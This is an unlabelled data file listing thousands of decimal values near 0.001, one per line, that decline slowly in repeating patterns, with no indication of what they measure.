0.00117586
0.00117586
0.00117586
0.00117158
0.00117158
0.00116704
0.00116287
0.00116707
0.00116281
0.00116284
0.00116701
0.00116707
0.00116704
0.00116287
0.00116707
0.00116281
0.00116284
0.00116701
0.00116707
0.00117161
0.00117584
0.00117578
0.00117159
0.00117581
0.00117165
0.00117159
0.00117162
0.00117584
0.00117578
0.00117159
0.00117582
0.00117165
0.00117159
0.00116708
0.0011628
0.0011628
0.0011628
0.00116708
0.00116708
0.00116707
0.00117158
0.00116707
0.00117159
0.00115403
0.00114951
0.00115403
0.00114952
0.00114953
0.00114524
0.00114524
0.00114952
0.00114952
0.00114524
0.00115406
0.00115822
0.00115829
0.00115403
0.00115826
0.00115403
0.00115409
0.00115406
0.00115823
0.00115829
0.00115403
0.00115826
0.00115403
0.00115409
0.00115402
0.0011583
0.0011583
0.0011583
0.00115402
0.00115402
0.00114948
0.00114526
0.00114951
0.00114531
0.00114951
0.00114528
0.00114945
0.00114948
0.00114526
0.00114951
0.00114531
0.00114951
0.00114528
0.00114945
0.00113196
0.00113647
0.00113196
0.00113647
0.00113646
0.00114075
0.00114075
0.00114075
0.00113646
0.00113646
0.00113193
0.00112776
0.00113196
0.0011277
0.00113195
0.0011319
0.00112772
0.00113193
0.00112776
0.00113196
0.0011277
0.00113195
0.00113189
0.00112772
0.0011365
0.00114073
0.00114067
0.00113648
0.00114071
0.00113648
0.00113654
0.0011365
0.00114073
0.00114067
0.00113648
0.00114071
0.00113648
0.00113654
0.00113197
0.00112769
0.00112769
0.00113197
0.00113197
0.00112768
0.00114952
0.0011495
0.00114525
0.00114526
0.00114952
0.00114951
0.00114525
0.00115403
0.0011583
0.00115404
0.0011583
0.00115403
0.00115403
0.00115404
0.0011583
0.00115828
0.00115403
0.0011583
0.00115404
0.00114952
0.00114525
0.00114951
0.00114952
0.00114525
0.00113647
0.00114074
0.00114073
0.00113648
0.00114074
0.00113647
0.00113648
0.00113197
0.00113196
0.00112769
0.00112769
0.00113197
0.00113647
0.00114075
0.00113648
0.00114075
0.00113647
0.00113197
0.00113194
0.00112769
0.0011277
0.00112769
0.00113196
0.00113195
0.00113647
0.00114074
0.00114073
0.00113648
0.00114074
0.00113647
0.00113648
0.00113197
0.00113195
0.00112769
0.00113196
0.00112769
0.00113647
0.00114074
0.00113648
0.00114074
0.00113647
0.00113197
0.00113194
0.00112769
0.0011277
0.00113196
0.00113195
0.00112769
0.00114953
0.00114524
0.00114524
0.00114952
0.00114952
0.00114524
0.00115406
0.00115822
0.00115829
0.00115403
0.00115403
0.00115826
0.00115409
0.00115406
0.00115822
0.00115828
0.00115403
0.00115409
0.00115826
0.00115403
0.00115401
0.0011583
0.0011583
0.00115402
0.0011583
0.00115402
0.00114948
0.00114526
0.00114951
0.00114531
0.00114951
0.00114945
0.00114528
0.00114948
0.00114526
0.00114951
0.00114531
0.00114945
0.00114951
0.00114528
0.00115403
0.00114952
0.00113196
0.00113647
0.00113646
0.00114075
0.00114075
0.00114075
0.00113647
0.00113647
0.00113193
0.00112776
0.00113196
0.0011277
0.0011319
0.00113195
0.00112772
0.00113193
0.00112776
0.00113196
0.0011277
0.00113195
0.0011319
0.00112772
0.00113651
0.00114073
0.00114067
0.00113648
0.00113654
0.00114071
0.00113648
0.00113651
0.00114073
0.00114067
0.00113648
0.00114071
0.00113648
0.00113654
0.00113197
0.00112769
0.00112769
0.00113197
0.00113197
0.00112768
0.00113196
0.00113647
0.00114953
0.00114951
0.00114525
0.00114527
0.00114952
0.00114951
0.00114525
0.00115403
0.0011583
0.00115404
0.0011583
0.00115403
0.00115403
0.00115405
0.0011583
0.00115828
0.00115403
0.0011583
0.00115404
0.00114953
0.00114525
0.00114952
0.00114953
0.00114525
0.00113647
0.00114073
0.00114074
0.00113649
0.00114074
0.00113649
0.00113647
0.00113197
0.00113195
0.00112769
0.00112769
0.00113197
0.00113647
0.00114074
0.00113648
0.00114074
0.00113647
0.00113197
0.00113195
0.00112771
0.00112769
0.00112769
0.00113195
0.00113196
0.00113647
0.00114074
0.00114073
0.00113649
0.00114075
0.00113647
0.00113649
0.00113197
0.00113196
0.00112769
0.00113197
0.00112769
0.00113647
0.00114075
0.00113648
0.00114075
0.00113647
0.00113197
0.00113195
0.0011277
0.00112771
0.00113197
0.00113196
0.0011277
0.00114952
0.0011495
0.00114526
0.00114525
0.00114951
0.00114952
0.00114525
0.00115403
0.0011583
0.00115403
0.00115403
0.0011583
0.00115403
0.00115404
0.00115828
0.0011583
0.00115404
0.0011583
0.00115403
0.00114952
0.00114525
0.00114951
0.00114952
0.00114525
0.00114952
0.0011495
0.00114525
0.00114526
0.00114952
0.00114951
0.00114525
0.00115403
0.0011583
0.00115403
0.0011583
0.00115402
0.00115403
0.00115404
0.0011583
0.00115828
0.0011583
0.00115403
0.00115404
0.00114952
0.00114525
0.00114951
0.00114952
0.00114525
0.00113647
0.00114073
0.00114074
0.00113649
0.00114075
0.00113648
0.00113647
0.00113197
0.00113196
0.00112769
0.00113197
0.00112769
0.00113647
0.00114074
0.00113648
0.00114075
0.00113647
0.00113197
0.00113195
0.00112771
0.00112769
0.00113195
0.00113197
0.00112769
0.00113647
0.00114074
0.00114072
0.00113649
0.00114074
0.00113647
0.00113648
0.00113196
0.00113195
0.00112769
0.00113196
0.00112769
0.00113647
0.00114074
0.00113648
0.00114074
0.00113647
0.00113197
0.00113195
0.0011277
0.00112771
0.00113197
0.00113195
0.00112769
0.00114953
0.00114524
0.00114524
0.00114953
0.00114952
0.00114524
0.00115406
0.00115823
0.00115829
0.00115403
0.00115404
0.00115826
0.00115409
0.00115406
0.00115823
0.00115829
0.00115403
0.00115409
0.00115826
0.00115404
0.00115402
0.0011583
0.0011583
0.00115402
0.00115831
0.00115402
0.00114949
0.00114526
0.00114952
0.00114532
0.00114951
0.00114945
0.00114528
0.00114949
0.00114526
0.00114952
0.00114532
0.00114945
0.00114951
0.00114528
0.00115403
0.00114952
0.00113196
0.00113648
0.00113646
0.00114075
0.00114075
0.00114075
0.00113647
0.00113647
0.00113193
0.00112776
0.00113196
0.0011277
0.0011319
0.00113196
0.00112773
0.00113193
0.00112776
0.00113196
0.0011277
0.00113196
0.0011319
0.00112773
0.00113651
0.00114073
0.00114067
0.00113648
0.00113654
0.00114071
0.00113648
0.00113651
0.00114074
0.00114067
0.00113648
0.00114071
0.00113648
0.00113654
0.00113197
0.00112769
0.00112769
0.00113197
0.00113197
0.00112768
0.00113196
0.00113648
0.00114953
0.00114951
0.00114526
0.00114525
0.00114951
0.00114952
0.00114525
0.00115403
0.0011583
0.00115404
0.00115403
0.0011583
0.00115403
0.00115405
0.00115829
0.0011583
0.00115404
0.00115831
0.00115403
0.00114953
0.00114525
0.00114951
0.00114953
0.00114525
0.00114952
0.00114951
0.00114526
0.00114525
0.00114951
0.00114952
0.00114525
0.00115403
0.00115831
0.00115404
0.0011583
0.00115403
0.00115403
0.00115405
0.00115829
0.0011583
0.0011583
0.00115405
0.00115403
0.00114952
0.00114525
0.00114951
0.00114952
0.00114525
0.00113647
0.00114073
0.00114074
0.00113649
0.00114075
0.00113649
0.00113647
0.00113197
0.00113196
0.00112769
0.00113197
0.00112769
0.00113647
0.00114075
0.00113648
0.00114075
0.00113647
0.00113197
0.00113195
0.00112771
0.00112769
0.00113196
0.00113197
0.00112769
0.00113647
0.00114072
0.00114074
0.00113649
0.00114074
0.00113648
0.00113647
0.00113196
0.00113195
0.00112769
0.00113196
0.00112769
0.00113647
0.00114074
0.00113648
0.00114074
0.00113647
0.00113196
0.00113195
0.0011277
0.00112769
0.00113195
0.00113196
0.00112769
0.00115403
0.00114952
0.00115403
0.00114952
0.00113646
0.00114075
0.00114075
0.00114075
0.00113647
0.00113647
0.00113193
0.00112776
0.00113196
0.0011277
0.00112773
0.0011319
0.00113196
0.00113193
0.00112776
0.00113196
0.0011277
0.00112773
0.0011319
0.00113196
0.00113651
0.00114073
0.00114067
0.00113648
0.00114071
0.00113654
0.00113648
0.00113651
0.00114073
0.00114067
0.00113648
0.00114071
0.00113654
0.00113648
0.00113197
0.00112769
0.00112769
0.00112768
0.00113197
0.00113197
0.00113196
0.00113647
0.00113196
0.00113647
0.00111892
0.0011144
0.00111892
0.0011144
0.00111441
0.00111013
0.00111013
0.00111441
0.00111441
0.00111013
0.00111895
0.00112311
0.00112318
0.00111892
0.00112315
0.00111892
0.00111898
0.00111895
0.00112311
0.00112318
0.00111892
0.00112315
0.00111892
0.00111898
0.0011189
0.00112319
0.00112319
0.00112319
0.00111891
0.00111891
0.00111437
0.00111014
0.0011144
0.0011102
0.0011144
0.00111017
0.00111434
0.00111437
0.00111014
0.0011144
0.0011102
0.0011144
0.00111017
0.00111434
0.00109685
0.00110136
0.00109685
0.00110136
0.00110135
0.00110563
0.00110563
0.00110564
0.00110135
0.00110135
0.00109681
0.00109264
0.00109684
0.00109259
0.00109684
0.00109678
0.00109261
0.00109682
0.00109264
0.00109684
0.00109259
0.00109684
0.00109678
0.00109261
0.00110139
0.00110562
0.00110555
0.00110136
0.00110559
0.00110137
0.00110142
0.00110139
0.00110562
0.00110555
0.00110136
0.00110559
0.00110136
0.00110142
0.00109686
0.00109257
0.00109257
0.00109685
0.00109685
0.00109257
0.00111441
0.00111439
0.00111014
0.00111015
0.00111441
0.0011144
0.00111014
0.00111891
0.00112319
0.00111892
0.00112319
0.00111891
0.00111891
0.00111893
0.00112319
0.00112317
0.00111892
0.00112319
0.00111893
0.00111441
0.00111014
0.0011144
0.00111441
0.00111014
0.00110136
0.00110563
0.00110561
0.00110137
0.00110563
0.00110136
0.00110137
0.00109685
0.00109684
0.00109258
0.00109258
0.00109685
0.00110135
0.00110563
0.00110136
0.00110563
0.00110135
0.00109685
0.00109683
0.00109258
0.00109259
0.00109258
0.00109685
0.00109683
0.00110136
0.00110563
0.00110562
0.00110137
0.00110563
0.00110136
0.00110137
0.00109686
0.00109685
0.00109258
0.00109686
0.00109258
0.00110136
0.00110563
0.00110137
0.00110563
0.00110136
0.00109686
0.00109683
0.00109258
0.00109259
0.00109685
0.00109684
0.00109258
0.00111441
0.00111013
0.00111013
0.00111441
0.00111441
0.00111013
0.00111895
0.00112311
0.00112318
0.00111892
0.00111892
0.00112315
0.00111898
0.00111895
0.00112311
0.00112318
0.00111892
0.00111898
0.00112315
0.00111892
0.0011189
0.00112319
0.00112319
0.00111891
0.00112319
0.00111891
0.00111437
0.00111014
0.0011144
0.0011102
0.0011144
0.00111434
0.00111017
0.00111437
0.00111014
0.0011144
0.0011102
0.00111434
0.0011144
0.00111017
0.00111892
0.0011144
0.00109685
0.00110136
0.00110135
0.00110563
0.00110563
0.00110564
0.00110135
0.00110135
0.00109682
0.00109265
0.00109685
0.00109259
0.00109678
0.00109684
0.00109261
0.00109682
0.00109265
0.00109684
0.00109259
0.00109684
0.00109678
0.00109261
0.00110139
0.00110562
0.00110556
0.00110137
0.00110143
0.00110559
0.00110137
0.00110139
0.00110562
0.00110556
0.00110136
0.00110559
0.00110137
0.00110143
0.00109686
0.00109257
0.00109257
0.00109686
0.00109686
0.00109257
0.00109685
0.00110136
0.00111441
0.00111439
0.00111013
0.00111015
0.00111441
0.00111439
0.00111013
0.00111891
0.00112319
0.00111892
0.00112319
0.00111891
0.00111891
0.00111893
0.00112319
0.00112317
0.00111892
0.00112319
0.00111893
0.00111441
0.00111013
0.00111439
0.0011144
0.00111013
0.00110135
0.00110561
0.00110563
0.00110137
0.00110563
0.00110137
0.00110135
0.00109685
0.00109684
0.00109257
0.00109257
0.00109685
0.00110135
0.00110563
0.00110136
0.00110563
0.00110136
0.00109685
0.00109683
0.00109259
0.00109257
0.00109257
0.00109684
0.00109685
0.00110135
0.00110562
0.00110561
0.00110137
0.00110562
0.00110135
0.00110136
0.00109685
0.00109683
0.00109257
0.00109685
0.00109257
0.00110135
0.00110562
0.00110136
0.00110562
0.00110135
0.00109684
0.00109683
0.00109257
0.00109259
0.00109684
0.00109683
0.00109257
0.00111441
0.00111439
0.00111015
0.00111014
0.0011144
0.00111441
0.00111014
0.00111891
0.00112319
0.00111892
0.00111891
0.00112319
0.00111891
0.00111893
0.00112317
0.00112319
0.00111893
0.00112319
0.00111892
0.00111441
0.00111013
0.0011144
0.00111441
0.00111014
0.00111441
0.00111439
0.00111013
0.00111015
0.0011144
0.00111439
0.00111013
0.00111891
0.00112318
0.00111892
0.00112319
0.00111891
0.00111891
0.00111893
0.00112319
0.00112317
0.00112319
0.00111891
0.00111893
0.0011144
0.00111013
0.00111439
0.00111441
0.00111013
0.00110136
0.00110561
0.00110563
0.00110137
0.00110563
0.00110137
0.00110136
0.00109685
0.00109684
0.00109258
0.00109685
0.00109258
0.00110136
0.00110563
0.00110136
0.00110563
0.00110135
0.00109685
0.00109683
0.00109259
0.00109258
0.00109684
0.00109685
0.00109258
0.00110135
0.00110563
0.00110561
0.00110137
0.00110563
0.00110136
0.00110137
0.00109685
0.00109684
0.00109257
0.00109685
0.00109258
0.00110135
0.00110563
0.00110136
0.00110563
0.00110135
0.00109685
0.00109683
0.00109258
0.00109259
0.00109685
0.00109684
0.00109258
0.00111441
0.00111013
0.00111013
0.00111441
0.00111441
0.00111012
0.00111895
0.00112311
0.00112318
0.00111892
0.00111892
0.00112315
0.00111898
0.00111895
0.00112311
0.00112318
0.00111892
0.00111898
0.00112315
0.00111892
0.0011189
0.00112319
0.00112319
0.00111891
0.00112319
0.00111891
0.00111437
0.00111014
0.0011144
0.0011102
0.00111439
0.00111434
0.00111016
0.00111437
0.00111014
0.0011144
0.0011102
0.00111433
0.0011144
0.00111017
0.00111892
0.0011144
0.00109684
0.00110135
0.00110134
0.00110563
0.00110563
0.00110563
0.00110135
0.00110135
0.00109681
0.00109264
0.00109684
0.00109258
0.00109678
0.00109684
0.00109261
0.00109681
0.00109264
0.00109684
0.00109258
0.00109683
0.00109678
0.00109261
0.00110139
0.00110561
0.00110555
0.00110136
0.00110142
0.00110559
0.00110136
0.00110139
0.00110562
0.00110555
0.00110136
0.00110559
0.00110136
0.00110142
0.00109685
0.00109257
0.00109257
0.00109685
0.00109685
0.00109256
0.00109684
0.00110135
0.0011144
0.00111439
0.00111014
0.00111013
0.00111439
0.0011144
0.00111013
0.00111891
0.00112319
0.00111892
0.00111891
0.00112319
0.00111891
0.00111893
0.00112317
0.00112318
0.00111892
0.00112319
0.00111891
0.0011144
0.00111013
0.00111439
0.0011144
0.00111013
0.00111441
0.00111439
0.00111015
0.00111013
0.00111439
0.0011144
0.00111013
0.00111891
0.00112318
0.00111892
0.00112319
0.00111891
0.00111891
0.00111893
0.00112317
0.00112318
0.00112318
0.00111893
0.00111891
0.00111441
0.00111013
0.0011144
0.00111441
0.00111013
0.00110135
0.00110561
0.00110562
0.00110137
0.00110562
0.00110136
0.00110135
0.00109685
0.00109684
0.00109257
0.00109685
0.00109257
0.00110135
0.00110562
0.00110136
0.00110562
0.00110135
0.00109685
0.00109683
0.00109259
0.00109258
0.00109683
0.00109685
0.00109257
0.00110135
0.00110561
0.00110563
0.00110137
0.00110563
0.00110137
0.00110136
0.00109685
0.00109684
0.00109258
0.00109685
0.00109258
0.00110135
0.00110563
0.00110136
0.00110563
0.00110135
0.00109685
0.00109683
0.00109259
0.00109258
0.00109684
0.00109685
0.00109258
0.00111892
0.0011144
0.00111892
0.0011144
0.00110135
0.00110563
0.00110563
0.00110563
0.00110135
0.00110135
0.00109682
0.00109264
0.00109684
0.00109258
0.00109261
0.00109678
0.00109684
0.00109682
0.00109264
0.00109684
0.00109259
0.00109261
0.00109678
0.00109684
0.00110139
0.00110562
0.00110555
0.00110136
0.00110559
0.00110142
0.00110136
0.00110139
0.00110562
0.00110556
0.00110136
0.00110559
0.00110142
0.00110136
0.00109686
0.00109257
0.00109257
0.00109257
0.00109685
0.00109685
0.00109684
0.00110136
0.00109685
0.00110136
0.0010838
0.00107929
0.0010838
0.00107929
0.0010793
0.00107501
0.00107501
0.00107929
0.00107929
0.00107501
0.00108383
0.001088
0.00108806
0.00108381
0.00108804
0.00108381
0.00108386
0.00108383
0.001088
0.00108806
0.0010838
0.00108804
0.00108381
0.00108386
0.00108379
0.00108808
0.00108808
0.00108808
0.00108379
0.00108379
0.00107925
0.00107503
0.00107929
0.00107508
0.00107928
0.00107505
0.00107922
0.00107925
0.00107503
0.00107928
0.00107508
0.00107928
0.00107505
0.00107922
0.00106173
0.00106624
0.00106173
0.00106624
0.00106623
0.00107052
0.00107051
0.00107052
0.00106623
0.00106623
0.0010617
0.00105753
0.00106172
0.00105747
0.00106172
0.00106167
0.00105749
0.0010617
0.00105752
0.00106172
0.00105747
0.00106172
0.00106166
0.00105749
0.00106627
0.0010705
0.00107044
0.00106624
0.00107048
0.00106625
0.00106631
0.00106627
0.0010705
0.00107044
0.00106624
0.00107048
0.00106625
0.00106631
0.00106174
0.00105745
0.00105745
0.00106173
0.00106173
0.00105745
0.00107929
0.00107928
0.00107502
0.00107503
0.00107929
0.00107928
0.00107502
0.0010838
0.00108807
0.00108381
0.00108808
0.0010838
0.0010838
0.00108382
0.00108807
0.00108806
0.0010838
0.00108808
0.00108381
0.00107929
0.00107502
0.00107928
0.00107929
0.00107502
0.00106624
0.00107051
0.0010705
0.00106626
0.00107052
0.00106624
0.00106625
0.00106174
0.00106172
0.00105746
0.00105746
0.00106174
0.00106624
0.00107051
0.00106625
0.00107052
0.00106624
0.00106174
0.00106172
0.00105746
0.00105748
0.00105746
0.00106174
0.00106172
0.00106624
0.00107052
0.0010705
0.00106626
0.00107052
0.00106624
0.00106625
0.00106174
0.00106173
0.00105747
0.00106174
0.00105747
0.00106624
0.00107052
0.00106625
0.00107052
0.00106624
0.00106174
0.00106172
0.00105747
0.00105748
0.00106174
0.00106172
0.00105746
0.0010793
0.00107502
0.00107501
0.0010793
0.0010793
0.00107501
0.00108383
0.001088
0.00108806
0.00108381
0.00108381
0.00108804
0.00108387
0.00108383
0.001088
0.00108806
0.0010838
0.00108386
0.00108804
0.00108381
0.00108379
0.00108808
0.00108808
0.00108379
0.00108808
0.00108379
0.00107926
0.00107503
0.00107929
0.00107509
0.00107928
0.00107922
0.00107505
0.00107925
0.00107503
0.00107928
0.00107508
0.00107922
0.00107928
0.00107505
0.0010838
0.00107929
0.00106173
0.00106624
0.00106623
0.00107052
0.00107052
0.00107052
0.00106624
0.00106624
0.0010617
0.00105753
0.00106173
0.00105747
0.00106166
0.00106173
0.00105749
0.0010617
0.00105752
0.00106173
0.00105747
0.00106172
0.00106166
0.00105749
0.00106628
0.0010705
0.00107044
0.00106625
0.00106631
0.00107048
0.00106625
0.00106627
0.0010705
0.00107044
0.00106625
0.00107048
0.00106625
0.00106631
0.00106174
0.00105746
0.00105746
0.00106174
0.00106174
0.00105745
0.00106173
0.00106624
0.00107929
0.00107927
0.00107502
0.00107503
0.00107929
0.00107927
0.00107502
0.00108379
0.00108807
0.0010838
0.00108807
0.00108379
0.00108379
0.00108381
0.00108807
0.00108805
0.0010838
0.00108807
0.00108381
0.00107929
0.00107501
0.00107928
0.00107929
0.00107502
0.00106624
0.00107049
0.00107051
0.00106625
0.00107051
0.00106625
0.00106624
0.00106173
0.00106172
0.00105746
0.00105746
0.00106173
0.00106624
0.00107051
0.00106625
0.00107051
0.00106624
0.00106173
0.00106172
0.00105747
0.00105746
0.00105746
0.00106172
0.00106173
0.00106624
0.00107051
0.00107049
0.00106625
0.00107051
0.00106624
0.00106625
0.00106173
0.00106172
0.00105746
0.00106173
0.00105746
0.00106624
0.00107051
0.00106624
0.00107051
0.00106624
0.00106173
0.00106172
0.00105746
0.00105747
0.00106173
0.00106171
0.00105746
0.00107929
0.00107928
0.00107503
0.00107502
0.00107928
0.00107929
0.00107502
0.0010838
0.00108807
0.00108381
0.0010838
0.00108807
0.0010838
0.00108382
0.00108806
0.00108807
0.00108381
0.00108808
0.0010838
0.00107929
0.00107502
0.00107928
0.00107929
0.00107502
0.00107929
0.00107928
0.00107502
0.00107503
0.00107929
0.00107928
0.00107502
0.0010838
0.00108807
0.0010838
0.00108807
0.00108379
0.0010838
0.00108382
0.00108807
0.00108805
0.00108807
0.0010838
0.00108381
0.00107929
0.00107502
0.00107928
0.00107929
0.00107502
0.00106624
0.0010705
0.00107051
0.00106625
0.00107051
0.00106625
0.00106624
0.00106173
0.00106172
0.00105746
0.00106173
0.00105746
0.00106624
0.00107051
0.00106625
0.00107051
0.00106624
0.00106173
0.00106171
0.00105747
0.00105746
0.00106172
0.00106173
0.00105746
0.00106624
0.00107051
0.0010705
0.00106625
0.00107051
0.00106624
0.00106625
0.00106173
0.00106172
0.00105746
0.00106173
0.00105746
0.00106624
0.00107051
0.00106624
0.00107051
0.00106624
0.00106173
0.00106171
0.00105746
0.00105747
0.00106173
0.00106172
0.00105746
0.00107929
0.00107501
0.00107501
0.00107929
0.00107929
0.001075
0.00108383
0.001088
0.00108806
0.0010838
0.0010838
0.00108803
0.00108386
0.00108383
0.001088
0.00108805
0.0010838
0.00108386
0.00108803
0.0010838
0.00108378
0.00108807
0.00108807
0.00108379
0.00108807
0.00108379
0.00107925
0.00107502
0.00107928
0.00107508
0.00107928
0.00107922
0.00107505
0.00107925
0.00107502
0.00107928
0.00107508
0.00107922
0.00107928
0.00107505
0.00108379
0.00107928
0.00106173
0.00106624
0.00106623
0.00107051
0.00107051
0.00107052
0.00106623
0.00106623
0.00106169
0.00105752
0.00106172
0.00105746
0.00106166
0.00106172
0.00105749
0.00106169
0.00105752
0.00106172
0.00105746
0.00106172
0.00106166
0.00105749
0.00106627
0.0010705
0.00107044
0.00106624
0.0010663
0.00107047
0.00106624
0.00106627
0.0010705
0.00107044
0.00106624
0.00107047
0.00106624
0.0010663
0.00106174
0.00105745
0.00105745
0.00106173
0.00106173
0.00105745
0.00106172
0.00106624
0.00107929
0.00107927
0.00107503
0.00107502
0.00107927
0.00107929
0.00107501
0.00108379
0.00108807
0.0010838
0.00108379
0.00108807
0.00108379
0.00108381
0.00108805
0.00108807
0.00108381
0.00108807
0.00108379
0.00107929
0.00107501
0.00107928
0.00107929
0.00107501
0.00107929
0.00107927
0.00107503
0.00107501
0.00107928
0.00107928
0.00107501
0.00108379
0.00108807
0.0010838
0.00108807
0.00108379
0.00108379
0.00108381
0.00108806
0.00108807
0.00108807
0.00108381
0.00108379
0.00107929
0.00107501
0.00107928
0.00107929
0.00107501
0.00106624
0.00107049
0.00107051
0.00106625
0.00107051
0.00106625
0.00106624
0.00106173
0.00106172
0.00105746
0.00106173
0.00105746
0.00106624
0.00107051
0.00106624
0.00107051
0.00106623
0.00106173
0.00106172
0.00105747
0.00105746
0.00106172
0.00106173
0.00105746
0.00106623
0.00107049
0.00107051
0.00106625
0.00107051
0.00106625
0.00106624
0.00106173
0.00106172
0.00105745
0.00106173
0.00105746
0.00106623
0.00107051
0.00106624
0.00107051
0.00106623
0.00106173
0.00106171
0.00105747
0.00105746
0.00106171
0.00106173
0.00105746
0.0010838
0.00107928
0.0010838
0.00107928
0.00106623
0.00107051
0.00107051
0.00107052
0.00106623
0.00106623
0.0010617
0.00105753
0.00106172
0.00105746
0.00105749
0.00106166
0.00106172
0.00106169
0.00105752
0.00106172
0.00105746
0.00105749
0.00106166
0.00106172
0.00106627
0.0010705
0.00107043
0.00106624
0.00107047
0.0010663
0.00106624
0.00106627
0.0010705
0.00107043
0.00106624
0.00107047
0.0010663
0.00106624
0.00106174
0.00105745
0.00105745
0.00105745
0.00106173
0.00106173
0.00106173
0.00106624
0.00106172
0.00106624
0.00104868
0.00104417
0.00104868
0.00104417
0.00104418
0.00103989
0.00103989
0.00104418
0.00104417
0.00103989
0.00104871
0.00105288
0.00105294
0.00104869
0.00105292
0.00104869
0.00104875
0.00104871
0.00105288
0.00105294
0.00104868
0.00105291
0.00104869
0.00104875
0.00104867
0.00105296
0.00105296
0.00105296
0.00104867
0.00104867
0.00104414
0.00103991
0.00104417
0.00103997
0.00104416
0.00103993
0.00104411
0.00104414
0.00103991
0.00104417
0.00103997
0.00104416
0.00103993
0.00104411
0.00102662
0.00103113
0.00102661
0.00103112
0.00103111
0.0010354
0.0010354
0.0010354
0.00103112
0.00103112
0.00102658
0.00102241
0.00102661
0.00102235
0.00102661
0.00102655
0.00102238
0.00102658
0.00102241
0.00102661
0.00102235
0.00102661
0.00102655
0.00102238
0.00103116
0.00103538
0.00103532
0.00103113
0.00103536
0.00103113
0.00103119
0.00103116
0.00103538
0.00103532
0.00103113
0.00103536
0.00103113
0.00103119
0.00102662
0.00102234
0.00102234
0.00102662
0.00102662
0.00102233
0.00104418
0.00104416
0.0010399
0.00103992
0.00104418
0.00104417
0.0010399
0.00104868
0.00105296
0.00104869
0.00105296
0.00104868
0.00104868
0.0010487
0.00105296
0.00105294
0.00104868
0.00105296
0.0010487
0.00104418
0.0010399
0.00104417
0.00104418
0.0010399
0.00103113
0.0010354
0.00103539
0.00103114
0.0010354
0.00103112
0.00103114
0.00102662
0.00102661
0.00102234
0.00102234
0.00102662
0.00103113
0.0010354
0.00103114
0.0010354
0.00103113
0.00102662
0.0010266
0.00102235
0.00102236
0.00102235
0.00102662
0.00102661
0.00103112
0.00103539
0.00103538
0.00103114
0.00103539
0.00103112
0.00103114
0.00102662
0.00102661
0.00102234
0.00102662
0.00102235
0.00103112
0.0010354
0.00103113
0.0010354
0.00103112
0.00102662
0.0010266
0.00102234
0.00102236
0.00102662
0.0010266
0.00102234
0.00104418
0.00103989
0.00103989
0.00104418
0.00104417
0.00103989
0.00104872
0.00105288
0.00105295
0.00104869
0.00104869
0.00105292
0.00104875
0.00104871
0.00105288
0.00105294
0.00104868
0.00104874
0.00105292
0.00104869
0.00104867
0.00105296
0.00105296
0.00104867
0.00105296
0.00104867
0.00104414
0.00103991
0.00104417
0.00103997
0.00104416
0.0010441
0.00103993
0.00104413
0.00103991
0.00104416
0.00103997
0.0010441
0.00104416
0.00103993
0.00104868
0.00104417
0.00102661
0.00103113
0.00103111
0.0010354
0.0010354
0.0010354
0.00103112
0.00103111
0.00102658
0.00102241
0.00102661
0.00102235
0.00102655
0.00102661
0.00102237
0.00102658
0.00102241
0.00102661
0.00102235
0.0010266
0.00102655
0.00102237
0.00103116
0.00103539
0.00103532
0.00103113
0.00103119
0.00103536
0.00103113
0.00103116
0.00103538
0.00103532
0.00103112
0.00103535
0.00103113
0.00103119
0.00102662
0.00102234
0.00102233
0.00102662
0.00102662
0.00102233
0.00102661
0.00103112
0.00104418
0.00104416
0.0010399
0.00103992
0.00104418
0.00104416
0.0010399
0.00104868
0.00105295
0.00104869
0.00105295
0.00104868
0.00104868
0.0010487
0.00105295
0.00105293
0.00104868
0.00105295
0.00104869
0.00104418
0.0010399
0.00104416
0.00104418
0.0010399
0.00103112
0.00103538
0.00103539
0.00103114
0.0010354
0.00103113
0.00103112
0.00102662
0.00102661
0.00102234
0.00102234
0.00102662
0.00103112
0.00103539
0.00103113
0.0010354
0.00103112
0.00102661
0.0010266
0.00102235
0.00102234
0.00102234
0.0010266
0.00102661
0.00103112
0.00103539
0.00103538
0.00103114
0.0010354
0.00103112
0.00103113
0.00102662
0.0010266
0.00102234
0.00102661
0.00102234
0.00103112
0.00103539
0.00103113
0.0010354
0.00103112
0.00102661
0.0010266
0.00102234
0.00102235
0.00102661
0.0010266
0.00102234
0.00104417
0.00104415
0.00103991
0.0010399
0.00104415
0.00104417
0.00103989
0.00104868
0.00105295
0.00104869
0.00104868
0.00105295
0.00104867
0.00104869
0.00105294
0.00105295
0.00104869
0.00105295
0.00104868
0.00104417
0.00103989
0.00104416
0.00104417
0.00103989
0.00104417
0.00104415
0.0010399
0.00103991
0.00104417
0.00104415
0.0010399
0.00104868
0.00105295
0.00104869
0.00105295
0.00104867
0.00104867
0.00104869
0.00105295
0.00105293
0.00105295
0.00104868
0.00104869
0.00104417
0.00103989
0.00104416
0.00104417
0.0010399
0.00103111
0.00103537
0.00103539
0.00103113
0.00103539
0.00103113
0.00103112
0.00102661
0.0010266
0.00102234
0.00102661
0.00102234
0.00103111
0.00103539
0.00103112
0.00103539
0.00103111
0.00102661
0.00102659
0.00102235
0.00102234
0.0010266
0.00102661
0.00102234
0.00103112
0.00103539
0.00103538
0.00103113
0.00103539
0.00103112
0.00103113
0.00102661
0.0010266
0.00102234
0.00102661
0.00102234
0.00103112
0.00103539
0.00103112
0.00103539
0.00103112
0.00102661
0.00102659
0.00102234
0.00102235
0.00102661
0.0010266
0.00102234
0.00104417
0.00103989
0.00103989
0.00104417
0.00104417
0.00103989
0.00104871
0.00105288
0.00105294
0.00104868
0.00104868
0.00105291
0.00104874
0.00104871
0.00105288
0.00105294
0.00104868
0.00104874
0.00105291
0.00104868
0.00104867
0.00105295
0.00105295
0.00104867
0.00105296
0.00104867
0.00104413
0.00103991
0.00104416
0.00103997
0.00104416
0.0010441
0.00103993
0.00104413
0.0010399
0.00104416
0.00103996
0.0010441
0.00104416
0.00103993
0.00104868
0.00104416
0.00102661
0.00103112
0.00103111
0.00103539
0.00103539
0.0010354
0.00103111
0.00103111
0.00102657
0.0010224
0.0010266
0.00102234
0.00102654
0.0010266
0.00102237
0.00102657
0.0010224
0.0010266
0.00102234
0.0010266
0.00102654
0.00102237
0.00103115
0.00103538
0.00103532
0.00103113
0.00103119
0.00103535
0.00103113
0.00103115
0.00103538
0.00103531
0.00103112
0.00103535
0.00103113
0.00103118
0.00102662
0.00102233
0.00102233
0.00102661
0.00102661
0.00102233
0.0010266
0.00103112
0.00104417
0.00104415
0.00103991
0.0010399
0.00104415
0.00104417
0.0010399
0.00104867
0.00105295
0.00104868
0.00104867
0.00105295
0.00104867
0.00104869
0.00105293
0.00105295
0.00104869
0.00105295
0.00104868
0.00104417
0.00103989
0.00104416
0.00104417
0.0010399
0.00104417
0.00104415
